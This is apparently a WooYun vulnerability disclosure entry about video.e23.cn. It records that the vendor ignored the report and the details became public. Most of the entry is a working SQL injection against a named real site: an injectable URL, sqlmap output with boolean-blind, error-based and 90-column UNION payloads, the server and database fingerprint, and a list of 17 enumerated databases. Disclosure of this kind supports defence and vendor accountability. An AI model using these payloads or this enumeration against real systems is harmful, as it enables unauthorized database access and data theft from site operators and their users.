2016-01-05: 细节已通知厂商并且等待厂商处理中 2016-01-10: 厂商已经主动忽略漏洞,细节向公众公开
http://video.e23.cn/programs/view/postcomment.shtm?gb_text=1&submit=%d0%b4%c9%cf%c8%a5&vid=-1 OR 1=1* --
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://video.e23.cn:80/programs/view/postcomment.shtm?gb_text=1&submit=%d0%b4%c9%cf%c8%a5&vid=-1 OR 1=1 AND 9912=9912 -- Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: http://video.e23.cn:80/programs/view/postcomment.shtm?gb_text=1&submit=%d0%b4%c9%cf%c8%a5&vid=-1 OR 1=1 AND 8044=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (8044=8044) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(106)+CHAR(120)+CHAR(113))) -- Type: UNION query Title: Generic UNION query (NULL) - 90 columns Payload: http://video.e23.cn:80/programs/view/postcomment.shtm?gb_text=1&submit=%d0%b4%c9%cf%c8%a5&vid=-1 OR 1=-7020 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(76)+CHAR(88)+CHAR(104)+CHAR(72)+CHAR(65)+CHAR(101)+CHAR(105)+CHAR(110)+CHAR(84)+CHAR(80)+CHAR(113)+CHAR(98)+CHAR(106)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000available databases [17]:[*] fangchan[*] fangtannew[*] jiaju[*] kfccs[*] master[*] model[*] msdb[*] MSRM2[*] NewPublish[*] newszt[*] Northwind[*] peixun[*] pubs[*] ReviewForJiNan[*] shiping[*] tempdb[*] tvvtvdata
危害等级:无影响厂商忽略
忽略时间:2016-01-10 10:14
漏洞Rank:4 (WooYun评价)
暂无